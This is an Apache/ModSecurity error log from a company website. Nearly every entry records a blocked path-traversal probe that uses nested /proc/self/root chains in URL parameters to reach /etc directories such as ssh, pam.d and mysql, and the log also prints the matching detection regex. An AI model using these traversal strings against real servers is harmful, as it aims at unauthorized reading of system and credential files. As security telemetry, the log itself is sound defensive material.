[Wed Mar 18 10:09:53.839454 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:38676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkIfu8EFLIOrSqIpv-VAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:56.407370 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:60064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkJMdf6f5d65gmYZTOnQAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:09:57.773765 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:60080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkJew_le52K8_3pV3ZjAAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:10:03.934977 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:60090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkK0zinOy1jxa1j4cOogAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:10:06.439544 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:58668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkLuoXxyEfFpUF8f9njAAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:10:09.262154 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:58674] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkMdY0UrI5A3LftIyf-QAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:10:12.934116 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:48362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkNNa6ubjKNq_cu4aTPAAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:10:16.615784 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:48378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkOOw_le52K8_3pV3ZmgAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:10:44.807221 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:48394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkVCmAPhZkrhU8w4lm0wAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:10:48.474678 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:40768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkWNa6ubjKNq_cu4aTZQAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:10:49.811309 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:33066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkWQkwaGbbGflqUZAJ-gAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:10:52.323098 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:33076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkXNa6ubjKNq_cu4aTZwAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:10:58.749409 2026] [mime_magic:error] [pid 19507:tid 140411590858496] (70014)End of file found: [client 57.141.18.79:46840] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:10:59.623609 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:33090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkY-w_le52K8_3pV3ZvgAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:11:00.989080 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:56878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkZOyqAr6etmhZHNq5NAAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:11:03.506703 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:56884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkZ9Y0UrI5A3LftIygNgAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:11:04.924042 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:56892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkaPu8EFLIOrSqIpv-eAAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:11:05.392952 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:56904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkaeyqAr6etmhZHNq5OQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:11:05.523328 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:46364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkacdf6f5d65gmYZTO9QAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:11:08.247299 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:56908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkbOyqAr6etmhZHNq5PQAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:11:13.520211 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.241.31:51624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkcSmAPhZkrhU8w4lm7AAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:11:47.372047 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:45168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqkk_u8EFLIOrSqIpv-sAAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
